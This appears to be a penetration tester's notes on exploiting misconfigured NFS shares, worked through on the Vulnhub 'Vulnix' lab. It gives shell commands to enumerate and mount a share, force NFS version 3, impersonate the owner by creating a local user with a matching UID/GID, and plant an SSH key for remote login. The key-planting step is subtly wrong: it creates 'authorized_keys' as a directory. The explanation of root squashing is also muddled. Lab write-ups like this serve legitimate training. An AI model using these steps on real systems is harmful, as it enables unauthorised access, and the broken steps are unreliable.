# Background
- Network File Share. 
- This is a service used so that people can access certain parts of a remote filesystem. If this is badly configured it could mean that you grant excessive access to users. 
- You mount the NFS folder onto a local folder of your machine to interact with it. If root squashing is enabled, then our ability to interact with the NFS is initially liminted.  However, if we can rollback the NFS version to #3, then we can get around root squashing.
  - The way NFS works with permissions: to access a locally mounted share, your UID and GID need to match the ones of the shared directory on the server.  NFS version 4 doesn't show the remote UID and GID, but NFS version 3 does show this informaiton.  So, you can just create a user with the correct username, UID, and GID on the attacker box to access a locally-mounted NFS that has root squashing enabled.
- The /etc/exports file on the NFS share lists the different share volumes available for mounting to other computers as well as configuration settings like root Squashing.

# Enumeration (Vulnhub:Vulnix)
1. Check to see what the filesystem is sharing through this service.
```
showmount -e [IP]
```
2. Create a directory location to mount the NFS file system to your box.
```
mkdir -p /[file location]/nfs
```
3. Mount the NFS to your attacker machine at the designated NFS mounting location.
```
mount -t nfs [IP]:/[target file system from #1] [attacker file system NFS location from #2] -nolock
```
  Example
  ```
  mount -t nfs 10.10.10.12:/home/vulnix /root/Boxes/Vulnix/Exploits/nfs -nolock
  ```
4. Try to access the NFS mount at the location you created in #2 on your local box.  If you're unable to access this location, then the target has correctly enabled [root_squashing](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-securing_nfs-do_not_use_the_no_root_squash_option) so that we can't read the contents.
  - A way around this is to see if version 3 of NFS is enabled.
5. See if NFS version 3 is allowed for the NFS.
```
mount -t nfs -o vers=3 [IP]:/[target file system from #1] [attacker file system NFS location from #2] -nolock
```
6. If we can mount with NFS version 3, we should list the mounted file permissions to read the UID and GID of the system.
```
ls -ld [attacker file system NFS location from #2]
```
7. Create a new user on the attacker box with the UID and GID identified in #6.
```
groupadd --gid [GID from #6] [group name]
useradd --uid [UID from #6] --groups [group name from previous cmd] [user name]
sudo -u [user name from above command] ls -la [attacker file system NFS location from #2]
```
8. If the NFS is a home directory of a user AND SSH is open on the target, then we can use our new access to the NFS to add our SSH public key to the home directory of the allowed user.  Then we can just SSH into the target with the user whose home directory is exposed through NFS where we just uploaded our SSH public key.
```
mkdir [attacker file system NFS location from #2]/.ssh/authorized_keys
cp ~/.ssh/id_rsa.pub [directory you created in last cmd]
```
